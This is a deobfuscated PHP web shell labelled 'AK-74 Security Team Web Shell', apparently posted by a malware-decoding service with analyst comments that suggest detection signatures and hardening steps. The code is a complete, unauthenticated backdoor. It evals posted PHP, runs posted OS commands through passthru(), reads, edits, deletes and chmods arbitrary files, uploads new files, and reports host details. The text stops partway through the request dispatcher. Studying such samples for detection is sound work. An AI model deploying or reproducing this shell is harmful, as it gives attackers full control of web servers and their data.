WordPress などで見つかった PHP のマルウェア・ウイルス・改ざんコードをデコードし、オンラインで難読化を解除して、
元の読みやすいコードに戻して解読できます。
<?php
// Analyst note: deobfuscated PHP web shell sample. The HTML it emits further down titles itself
// "AK-74 Security Team Web Shell"; that fixed string and the act= / action= request parameters
// handled by the dispatcher at the end of the file are candidate anchors for content and
// access-log signatures.
// The many `$GLOBALS["..."] = "name";` and `$xxx = "name";` assignments are obfuscator residue:
// they hold variable names that are dereferenced elsewhere as `${$xxx}` (variable variables)
// and carry no logic of their own.
// No authentication or access check appears anywhere in the visible code: every handler acts
// directly on $_GET / $_POST / $_FILES values.
// error_reporting(0) and @set_time_limit(0) silence errors and lift the execution time limit;
// session_start() is needed because the browsed directory is kept in $_SESSION["currentdir"].
// NOTE(review): `$xshell = $SERVER_["PHP_SELF"]` reads an undefined variable as written;
// presumably a decoder artifact of an indirect $_SERVER reference (see `$fridqpc = "SERVER_"`).
// Confirm against the raw sample.
// class shell starts on this line; getfiles() lists the non-directory entries of the session
// directory with their size and modification time.
$GLOBALS["iknpldrpigo"] = "content"; $GLOBALS["olmwrdqid"] = "timestart"; $GLOBALS["fdxvupxbx"] = "shell"; $hilzzmbb = "content"; $GLOBALS["shdxowcvsq"] = "fp"; $GLOBALS["kdhmhcnuk"] = "files"; $GLOBALS["hdyzecu"] = "number"; $GLOBALS["gyyylpy"] = "content"; $GLOBALS["cvvtiemv"] = "dirs"; $nfhhbmkrpia = "content"; $bcaxbgujhqyk = "content"; $GLOBALS["kqhombvoisgz"] = "xshell"; $GLOBALS["nwkrhqdzrcw"] = "res"; $GLOBALS["fzszjgc"] = "info"; $GLOBALS["fvyvgcirdxx"] = "path"; $GLOBALS["pgctubg"] = "perms"; $GLOBALS["kmdyudoev"] = "sec"; $GLOBALS["xcglkyuot"] = "dir"; $GLOBALS["hoyoqwd"] = "mas"; $GLOBALS["vtpgxuvxbi"] = "file"; $osezbewemuin = "content"; $GLOBALS["dwjodtpv"] = "handle"; $GLOBALS["wdyvqrczdgu"] = "i"; error_reporting(0); $dbmeztzpbjd = "content"; @set_time_limit(0); $yuabcquera = "xshell"; $fridqpc = "SERVER_"; session_start(); $wupyapffrye = "content"; $xshell = $SERVER_["PHP_SELF"]; class shell { function getfiles() { $GLOBALS["qzgebdlknl"] = "mas"; $qeosfvpx = "mas"; $mas = array(); $i = 0; if ($handle = opendir($_SESSION["currentdir"])) { $GLOBALS["qmdtpcoeduj"] = "handle"; $GLOBALS["zoaynvkz"] = "file"; while (false !== ($file = readdir($handle))) { if ($file != "..") { if (!is_dir($_SESSION["currentdir"] . "/" . $file)) { $GLOBALS["sntlhgwvrnz"] = "file"; $GLOBALS["mpyjuxikn"] = "i"; $iwkugxydfbd = "file"; $qjtflnyw = "mas"; $nqlxlnj = "i"; $zibzmuilrsk = "i"; $mas[$i]["filename"] = $file; $GLOBALS["nhauqglig"] = "mas"; $vpezessuwf = "i"; $mas[$i]["filesize"] = filesize($_SESSION["currentdir"] . "/" . $file); $mas[$i]["lastmod"] = date("H.i/d.m.Y", filemtime($_SESSION["currentdir"] . "/" . 
// Next source line: rest of getfiles(); getdirs() lists sub-directories (only "." is skipped,
// so ".." stays available for moving upwards); geturl() maps the session directory to a path
// relative to DOCUMENT_ROOT.
// removefile() / removedir() take the path straight from $_GET["file"] / $_GET["dir"], chmod it
// to 0777 and then unlink()/rmdir() it: arbitrary deletion within the web server account's rights.
// removefile() returns "File deleted!" on both the success and the failure branch of unlink().
// getmicrotime() and the start of getpermission() follow.
$file)); $i++; } } } closedir($handle); } return $mas; } function getdirs() { $ovnbdybfxfn = "mas"; $GLOBALS["mscjpo"] = "mas"; $mas = array(); if ($handle = opendir($_SESSION["currentdir"])) { $GLOBALS["hobugedqduo"] = "dir"; $GLOBALS["xwlfufyf"] = "handle"; while (false !== ($dir = readdir($handle))) { $GLOBALS["iebmlxxk"] = "dir"; $qiwjehuaq = "dir"; $ulkfkgvahbq = "mas"; if ($dir != "." && is_dir($_SESSION["currentdir"] . "/" . $dir)) { $mas[] = $dir; } } closedir($handle); } return ${$ovnbdybfxfn}; } function geturl() { if ($_SESSION["currentdir"] . "/" == $_SERVER["DOCUMENT_ROOT"]) { return "/"; } if (strpos($_SESSION["currentdir"], str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"])) === false) { return ""; } return str_replace($_SERVER["DOCUMENT_ROOT"], "", $_SESSION["currentdir"] . "/"); } function removefile() { if (file_exists($_GET["file"])) { chmod($_GET["file"], 0777); if (unlink($_GET["file"])) { return "File deleted!"; } else { return "File deleted!"; } } else { return "File not found!"; } } function removedir() { chmod($_GET["dir"], 0777); if (rmdir($_GET["dir"])) { return "Directory deleted!"; } else { return "Directory not found!"; } } function getmicrotime() { $GLOBALS["azoxuqxbstyx"] = "sec"; $nyzhvmuivi = "usec"; $GLOBALS["gpoxftmel"] = "usec"; list($usec, $sec) = explode(" ", microtime()); return (double) $usec + (double) $sec; } function getpermission($path) { $xienitv = "info"; $pmibkwbh = "info"; $qusckboendqg = "info"; $umyijesr = "info"; $sxhrms = "info"; $tynbdsso = "info"; $perms = fileperms($path); $tyfxbbfd = "perms"; $qelozowxyjq = "perms"; $wuyjuf = "perms"; $qgfxtbdfnruf = "perms"; $siebgehypj = "info"; $pkgutlld = "perms"; $GLOBALS["uchwntfz"] = "info"; $GLOBALS["jckaac"] = "perms"; if (($perms & 0xc000) == 0xc000) { $info = "s"; } elseif (($perms & 0xa000) == 0xa000) { $info = "l"; } elseif (($perms & 0x8000) == 0x8000) { $info = "-"; } elseif (($perms & 0x6000) == 0x6000) { $info = "b"; } elseif (($perms & 0x4000) == 0x4000) { 
$info = "d"; } elseif (($perms & 0x2000) == 0x2000) { $info = "c"; } elseif (($perms & 0x1000) == 0x1000) { $info = "p"; } else { $info = "u"; } $info .= $perms & 0x100 ? "r" : "-"; $info .= $perms & 0x80 ? "w" : "-"; $info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); ${$qusckboendqg} .= $perms & 0x20 ? "r" : "-"; $fctqxhk = "info"; $info .= ${$tyfxbbfd} & 0x10 ? "w" : "-"; $info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-"); $GLOBALS["xqayvij"] = "perms"; $info .= $perms & 0x4 ? "r" : "-"; ${$umyijesr} .= $perms & 0x2 ? "w" : "-"; ${$tynbdsso} .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); return ${$fctqxhk}; } function getpermissionarray($path) { $iaorpkyboh = "res"; $GLOBALS["ffvutedscs"] = "perms"; $res = array(); $GLOBALS["mospvgr"] = "path"; $perms = fileperms($path); $GLOBALS["secvlqatfohv"] = "perms"; $GLOBALS["bzngcqtouq"] = "perms"; $GLOBALS["aboxvtoyg"] = "perms"; $filvvij = "perms"; $GLOBALS["woyxpuac"] = "res"; $GLOBALS["mdbgzpglccyj"] = "perms"; $ccbjnaxobblr = "res"; $otymmkoxf = "res"; $fbhqupebtq = "res"; $GLOBALS["vdddnl"] = "res"; $gkufmuhelf = "res"; if (($perms & 0xc000) == 0xc000) { $res[] = "s"; } elseif (($perms & 0xa000) == 0xa000) { $res[] = "l"; } elseif (($perms & 0x8000) == 0x8000) { $res[] = "-"; } elseif (($perms & 0x6000) == 0x6000) { $res[] = "b"; } elseif (($perms & 0x4000) == 0x4000) { $res[] = "d"; } elseif (($perms & 0x2000) == 0x2000) { $res[] = "c"; } elseif (($perms & 0x1000) == 0x1000) { $res[] = "p"; } else { $res[] = "u"; } $GLOBALS["nfmqqbwyhr"] = "perms"; $res[] = $perms & 0x100 ? "r" : "-"; $GLOBALS["rmhkov"] = "res"; $res[] = $perms & 0x80 ? "w" : "-"; $res[] = $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); $res[] = $perms & 0x20 ? "r" : "-"; $res[] = $perms & 0x10 ? "w" : "-"; ${$fbhqupebtq}[] = $perms & 0x8 ? ${$filvvij} & 0x400 ? "s" : "x" : ($perms & 0x400 ? 
"S" : "-"); $GLOBALS["gxyvyqrjw"] = "perms"; ${$otymmkoxf}[] = $perms & 0x4 ? "r" : "-"; $eyjzgfr = "perms"; $res[] = $perms & 0x2 ? "w" : "-"; ${$gkufmuhelf}[] = $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); return ${$iaorpkyboh}; } function outputhead() { $yeyubpcd = "res"; $res = ""; $res = "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\n<body>\n<STYLE>\nA:link {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:active {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:visited {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:hover {\n\tCOLOR: #C10000; TEXT-DECORATION: underline\n}\nTD {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\n}\nBODY {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \n}\n</STYLE>\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\n <tr>\n <td colspan=7 align=\"center\">\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: \n::.</font></b>\n </td>\n </tr>"; return $res; } function outputmenu() { $eblbmi = "xshell"; $GLOBALS["omlmyuabmc"] = "res"; $jrizoflsr = "xshell"; $GLOBALS["kzvefdrkoqf"] = "res"; $res = ""; $txbsfjnhvi = "xshell"; $res .= "<tr>\n <td colspan=7 align=\"center\">\n <table border=0 cellspacing=0 cellpadding=0>\n <tr align=\"center\">\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=info\">General information</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=filemanager\">File manager</a>\n\t </td>\n\t <td width=80>\n\t <a href=\"" . $xshell . 
"?act=phpinfo\" target=\"_blank\">phpinfo()</a>\n\t </td>\n\t <td width=110>\n\t <a href=\"" . $xshell . "?act=execute\">Run PHP</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=exesys\">Execute the command</a>\n\t </td>\n </tr>\n </table>\n </td>\n </tr>"; return $res; } function outputdown() { $res = ""; $GLOBALS["srzeskty"] = "res"; $res = "</table></div></body></html>"; return $res; } function outputfilemanager() { $GLOBALS["udmmztjca"] = "xshell"; $GLOBALS["ychruqucrf"] = "xshell"; $powlcxkoeay = "files"; $shvztfinhxe = "dirs"; $ckrwmyieozcl = "res"; $GLOBALS["vmuyoysyoe"] = "res"; $GLOBALS["orpfxw"] = "res"; $GLOBALS["tuwswjh"] = "res"; $GLOBALS["acmzbxffk"] = "res"; $res = ""; $GLOBALS["vdtvfpbhyru"] = "number"; $uxuysqwhok = "files"; $number = 0; $GLOBALS["sejtvw"] = "dirs"; $qflffdcxsrx = "i"; $dirs = $this->getdirs(); $files = $this->getfiles(); $GLOBALS["asxszifet"] = "i"; sort($dirs); sort($files); $res .= "\n <tr>\n <td colspan=7 align=\"center\">\n <font color=#830000> The current directory:</font><b><font color=#830000>" . $_SESSION["currentdir"] . "</font></b>\n </td>\n </tr>\n <tr align=\"center\">\n <td width=30>\n \n </td>\n <td width=330>\n \n </td>\n <td width=80><font color=#830000>,</font> <b><font color=#830000>byte</font></b>\n \n </td>\n <td width=120><font color=#830000>\n Recent change\n </font>\n </td>\n <td width=80 align=\"center\"><font color=#830000>Access right</font>\n \n </td>\n <td width=30>\n \n </td>\n <td width=30>\n \n </td>\n </tr>"; $kshyqqibce = "i"; $hjbbitpe = "res"; $GLOBALS["wyqypgtjmi"] = "i"; for ($i = 0; ${$qflffdcxsrx} < count(${$shvztfinhxe}); $i++) { $GLOBALS["vapieoe"] = "res"; $wokhmi = "xshell"; $GLOBALS["uvckfgaxtwdw"] = "res"; $kwqcswqlscsg = "i"; $GLOBALS["wjjxsx"] = "xshell"; $GLOBALS["bbrtstbve"] = "dirs"; $GLOBALS["jeyjcbtlodsa"] = "dirs"; $GLOBALS["ywnqtawj"] = "i"; $GLOBALS["fxthzy"] = "dirs"; $res .= "<tr><td><b><font color=#830000>" . ++$number . 
"</font></b></td><td><b><a href=\"" . $xshell . "?act=filemanager&dir=" . $dirs[$i] . "\">" . $dirs[$i] . "</a></b></td><td> </td><td> </td><td>"; $res .= "<a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $dirs[$i]) . "</a>"; $res .= "</td><td> </td><td><a href=\"" . $xshell . "?act=filemanager&act3=del&dir=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">delete</a></td></tr>"; } for (${$kshyqqibce} = 0; $i < count($files); $i++) { $GLOBALS["gkyyblyqymf"] = "i"; $fwvwil = "files"; $vdxzvdus = "res"; $gruvymtvqist = "xshell"; $GLOBALS["qwtxsjlqhhf"] = "files"; $evvwgjhmulxe = "files"; $GLOBALS["tefzqpvhph"] = "files"; $GLOBALS["omvsytrtatv"] = "i"; $GLOBALS["ypsmanoevl"] = "i"; $wpdhhfskcteg = "i"; $ihduysxmqju = "res"; $GLOBALS["tkghkgf"] = "res"; $res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td>"; $res .= "<td><a href=\"" . $xshell . "?act=down&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $files[$i]["filename"] . "</a></td>"; $res .= "<td> " . $files[$i]["filesize"] . "</td>"; $khftnbmpvvs = "xshell"; $res .= "<td align=\"center\">" . $files[$i]["lastmod"] . "</td>"; $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $files[$i]["filename"]) . "</a></td>"; $tomphosfc = "res"; $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=edit&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">edit</a></td>"; $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=filemanager&act2=del&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . 
"\">delete</a></td></tr>"; } ${$ckrwmyieozcl} .= "</table><br>"; $res .= "<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">"; $pykgqvz = "res"; $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"mkdir\"><b><font color=#830000> :</b></font> </td><td><input type=\"text\" name=\"dircreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"createfile\"><b><font color=#830000> :</b></font></td><td> <input type=\"text\" name=\"filecreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; $res .= "<tr><td align=center><form enctype=\"multipart/form-data\" action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"uploadfile\"><b><font color=#830000> :</font></b></td><td><input type=\"file\" name=\"filename\" size=\"23\"> <b><font color=#830000> </b></font></td><td> <input type=\"text\" name=\"filename2\"><input type=\"submit\" value=\"\"></form></td></tr>"; $res .= "<table border=0 width=\"700\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">"; ${$hjbbitpe} .= "<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return ${$pykgqvz}; } function outputinfo() { $vbgcqwfncvvz = "res"; $myhjur = "res"; $res = ""; $res .= "<tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>General information about the server</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"left\"><br>\n <ol>\n <b><font color=#830000>1. OS - </font></b><font color=#830000>" . php_uname() . "</font><br><br>\n <b><font color=#830000>2. PHP - </font></b><font color=#830000>" . 
// This source line: rest of outputinfo(), which prints host reconnaissance data (PHP version,
// process user / uid / gid, server software, request method and address values read from the
// environment), then the start of chmodform().
// chmodform() renders the permission checkboxes for $file and embeds $file in a hidden form
// field without escaping.
phpversion() . "</font><br><br>\n <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - " . get_current_user() . " <b><font color=#830000>|| User ID</font></b> - " . getmyuid() . " <b><font color=#830000>|| Group ID</b></font> - " . getmygid() . "</font><br><br>\n <b><font color=#830000>4. Server Software - </font></b><font color=#830000>" . getenv("SERVER_SOFTWARE") . "</font><br><br>\n <b><font color=#830000>5. Request Method - </font></b><font color=#830000>" . getenv("REQUEST_METHOD") . "</font><br><br>\n <b><font color=#830000>6. Server IP - </font></b><font color=#830000>" . getenv("SERVER_ADDR") . "</font><br><br>\n <b><font color=#830000>7. Your IP - </font></b><font color=#830000>" . getenv("REMOTE_ADDR") . "</font><br><br>\n\t<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>" . getenv("HTTP_X_FORWARDED_FOR") . "</font><br><br>\n</td>\n </tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return $res; } function chmodform($file) { $istixexbyxa = "file"; $nrugpeehr = "res"; $yvdvvaai = "i"; $GLOBALS["nwfedck"] = "perms"; $fewqjextf = "file"; $perms = $this->getpermissionarray($file); $GLOBALS["ynokejbtuh"] = "perms"; $GLOBALS["ngqiunigukfh"] = "perms"; $uizdfjdf = "res"; $hammouvne = "i"; $GLOBALS["ykexebt"] = "res"; $GLOBALS["pefltgfgwzb"] = "i"; $res = ""; $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"chmod\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . 
// Next source line: rest of chmodform(), then editfileform(). editfileform() opens the path it
// is given (the dispatcher passes $_GET["file"]) for reading and shows the content, escaped with
// htmlspecialchars(), in a textarea next to a rename field. Any file readable by the web server
// account can be viewed this way. The rename field's value attribute is written unquoted and
// unescaped.
"\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Changing access permissions</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; $ftrxmefkqxh = "i"; $res .= "<tr align=\"center\"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>"; $GLOBALS["yggjmwlv"] = "res"; $res .= "<tr><td><input type=\"hidden\" name=\"perms0\" value=\"" . $perms[0] . "\">" . $perms[0] . "</td>"; for ($i = 1; $i <= 9; $i++) { $res .= "<td><input type=\"checkbox\" name=\"perms" . ${$ftrxmefkqxh} . "\"" . ($perms[${$yvdvvaai}] != "-" ? " checked" : "") . "></td>"; } $res .= "</tr><tr><td colspan=10 align=\"right\"><input type=\"submit\" value=\"Save\"></td></tr>"; $res .= "</table></td></tr></form>"; return $res; } function editfileform($file) { $rwaotihpr = "fp"; $GLOBALS["wcqoifupsbh"] = "file"; $yyvjrmlhyubj = "fp"; $fp = fopen($file, "r"); if (!$fp) { return " "; } $res = ""; $zeleyib = "res"; $hjrxrmu = "res"; $GLOBALS["ryysceaq"] = "res"; $GLOBALS["yjdeuf"] = "res"; $GLOBALS["kwyxxau"] = "file"; $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"editfile\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\"><tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Edit the file</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; $res .= "<tr><td><textarea rows=25 cols=100 name=\"filecontent\">" . htmlspecialchars(fread(${$rwaotihpr}, filesize($file))) . "</textarea></td></tr>"; $res .= "<tr><td align=\"right\"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value=" . $file . 
// Next source line: tail of editfileform(), then executeform() (HTML form posting "phpcode"),
// execute(), and the start of exesysform().
// execute() passes $_POST["phpcode"], after stripslashes(), to eval(): request-supplied PHP runs
// inside the web server process. eval() fed directly from $_POST is the pattern to match when
// scanning a web root for this family.
"> - <input type=\"submit\" value=\"Edit\"></td></tr>"; $res .= "</table></td></tr></form>"; fclose(${$yyvjrmlhyubj}); return $res; } function executeform() { $GLOBALS["gbbivqermof"] = "xshell"; $GLOBALS["jcoxegkjqmx"] = "res"; $res = ""; $res .= "<form action=\"" . $xshell . "?act=execute\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"execute\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Executing PHP code<br> Opening and closing PHP code ( <? ?> ) no need to write!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name=\"phpcode\">"; $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return $res; } function execute() { echo "<hr>"; echo "<pre>"; eval(stripslashes($_POST["phpcode"])); echo "</pre>"; echo "<hr>"; } function exesysform() { $husxnjellv = "res"; $res = ""; $GLOBALS["lmwlmrqw"] = "res"; $GLOBALS["ubwopher"] = "res"; $res .= "<form action=\"" . $xshell . 
// Next source line: rest of exesysform() (form posting "cmmd"), exesys(), editfile(), and the
// start of chmodfile().
// exesys() hands $_POST["cmmd"] to passthru(): request-supplied OS command execution. Hosts that
// do not need process execution from PHP can list passthru and its sibling functions in the
// php.ini disable_functions directive.
// editfile() renames $_POST["file"] to $_POST["rename"] and overwrites the target with
// $_POST["filecontent"]; its $file parameter is never used.
// NOTE(review): when "rename" is empty, fopen() is still called with that empty path.
"?act=exesys\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"exesys\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Execute system commands!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name=\"cmmd\">"; $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"Perform\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"https://www.r57.gen.tr/\" title=\"r57.gen.tr\">r57.gen.tr</a> - <a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return $res; } function exesys() { $GLOBALS["yvcpokfc"] = "result"; echo "<hr>"; echo "<pre>"; $result = passthru($_POST["cmmd"]); echo "</pre>"; echo "<hr>"; } function editfile($file) { if (!empty($_POST["rename"])) { rename($_POST["file"], $_POST["rename"]); } $fp = fopen($_POST["rename"], "w"); if (!$fp) { return 0; } fwrite($fp, stripslashes($_POST["filecontent"])); fclose($fp); return 1; } function chmodfile($file) { $tpmdfbgb = "res"; $ipjaivcsdnlk = "res"; $sgwdghqlhfy = "res"; $GLOBALS["pufgvr"] = "res"; $fcpofletrcs = "res"; $GLOBALS["ikiudyniptdh"] = "res"; $GLOBALS["lzykxw"] = "res"; $hlfwyxuk = "res"; $feixofkogs = "res"; $tulbauxmvcdt = "res"; $txyrsfflh = "res"; $res = 0; $gorewqwudp = "res"; switch ($_POST["perms0"]) { case "s": $res |= 0xc000; break; case "l": $res = ${$gorewqwudp} | 0xa000; break; case "-": ${$hlfwyxuk} |= 0x8000; break; case "b": $res |= 0x6000; break; case "d": $res |= 0x4000; break; case "c": $res |= 0x2000; break; case "p": $res |= 0x1000; break; case "u": break; } $GLOBALS["xeomnnbyudw"] = "res"; if (isset($_POST["perms1"])) { $res |= 0x100; } if (isset($_POST["perms2"])) { $res = 
// This source line: rest of chmodfile() (builds a mode from the posted perms0..perms9 fields,
// echoes the octal digits and calls chmod() on $file, which the dispatcher fills from
// $_POST["file"]), then downloadfile(), createdir(), createfile() and the start of uploadfile().
// downloadfile() streams whatever readable path arrives in $_GET["file"] back as an attachment:
// arbitrary file read / exfiltration.
// createdir() / createfile() / uploadfile() append posted names to $_SESSION["currentdir"] with
// no validation; uploadfile() stores $_FILES["filename"] under $_POST["filename2"], falling back
// to the client-supplied file name, so it can plant further files on the host.
${$tpmdfbgb} | 0x80; } if (isset($_POST["perms3"])) { $res = ${$txyrsfflh} | 0x40; } if (isset($_POST["perms4"])) { ${$feixofkogs} = $res | 0x20; } if (isset($_POST["perms5"])) { $res |= 0x10; } if (isset($_POST["perms6"])) { $res = ${$tulbauxmvcdt} | 0x8; } if (isset($_POST["perms7"])) { $res = ${$fcpofletrcs} | 0x4; } if (isset($_POST["perms8"])) { $res |= 0x2; } if (isset($_POST["perms9"])) { $res |= 0x1; } echo substr(sprintf("%o", $res), 4); return chmod($file, intval(substr(sprintf("%o", $res), 4), 8)); } function downloadfile($file) { $jehqknntr = "file"; header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($file)); header("Content-Disposition: attachment; filename={$file}"); readfile($file); die; } function createdir() { if (!empty($_POST["dircreate"])) { if (mkdir($_SESSION["currentdir"] . "/" . $_POST["dircreate"])) { return "Directory created!"; } } return "Error creating directory"; } function createfile() { if (!empty($_POST["filecreate"])) { $GLOBALS["lwhsyzdtepf"] = "fp"; if (file_exists($_SESSION["currentdir"] . "/" . $_POST["filecreate"])) { return " "; } $fp = fopen($_SESSION["currentdir"] . "/" . $_POST["filecreate"], "w"); if ($fp) { $nwmcqdkwk = "fp"; fclose($fp); return " !"; } } return "Error creating file"; } function uploadfile() { if ($_FILES["filename"]["error"] != 0) { return "121212"; } $_POST["filename2"] = trim($_POST["filename2"]); if (empty($_POST["filename2"])) { $_POST["filename2"] = $_FILES["filename"]["name"]; } if (!copy($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) { if (!move_uploaded_file($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . 
// Next source line: end of uploadfile() and of class shell, then the top-level request dispatcher.
// $_SESSION["currentdir"] defaults to DOCUMENT_ROOT and is moved by $_GET["dir"] through
// realpath(), so browsing is not confined to the web root.
// $_POST["action"] selects a state-changing handler (chmod, editfile, execute, exesys, mkdir,
// createfile, uploadfile) and $_GET["act"] selects the view; neither switch is preceded by a
// credential or origin check.
// Log-review hint: requests to one .php path carrying act=filemanager / act=execute / act=exesys,
// or POST bodies with action=execute or action=exesys, match this dispatcher.
$_POST["filename2"])) { return "File download failed..."; } } return "The file was uploaded successfully!"; } } $shell = new shell(); $timestart = $shell->getmicrotime(); $content = ""; if (!isset($_SESSION["currentdir"])) { $_SESSION["currentdir"] = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]); } if (isset($_GET["dir"])) { if (opendir(realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]))) { $_SESSION["currentdir"] = realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]); } Header("Location: {$xshell}?act=filemanager"); } $_SESSION["currentdir"] = str_replace("\\", "/", $_SESSION["currentdir"]); $bxmeyfko = "content"; if (substr($_SESSION["currentdir"], 1, 1) == "/") { $_SESSION["currentdir"] = substr($_SESSION["currentdir"], 0, 1); } $GLOBALS["lvsmiwfpysj"] = "content"; switch ($_POST["action"]) { case "chmod": if ($shell->chmodfile($_POST["file"])) { ${$GLOBALS["iknpldrpigo"]} .= "The change was successful"; } break; case "editfile": if ($shell->editfile($_POST["file"])) { ${$wupyapffrye} .= "The edit was successful"; } break; case "execute": $shell->execute(); break; case "exesys": $shell->exesys(); break; case "mkdir": ${$GLOBALS["iknpldrpigo"]} .= $shell->createdir(); break; case "createfile": ${$dbmeztzpbjd} .= $shell->createfile(); break; case "uploadfile": ${$GLOBALS["iknpldrpigo"]} .= $shell->uploadfile(); break; } ${$GLOBALS["iknpldrpigo"]} .= $shell->outputhead(); ${$GLOBALS["iknpldrpigo"]} .= $shell->outputmenu(); switch ($_GET["act"]) { case "edit": ${$GLOBALS["gyyylpy"]} .= $shell->editfileform($_GET["file"]); break; case "chmod": ${$GLOBALS["lvsmiwfpysj"]} .= $shell->chmodform($_GET["file"]); break; case "down": 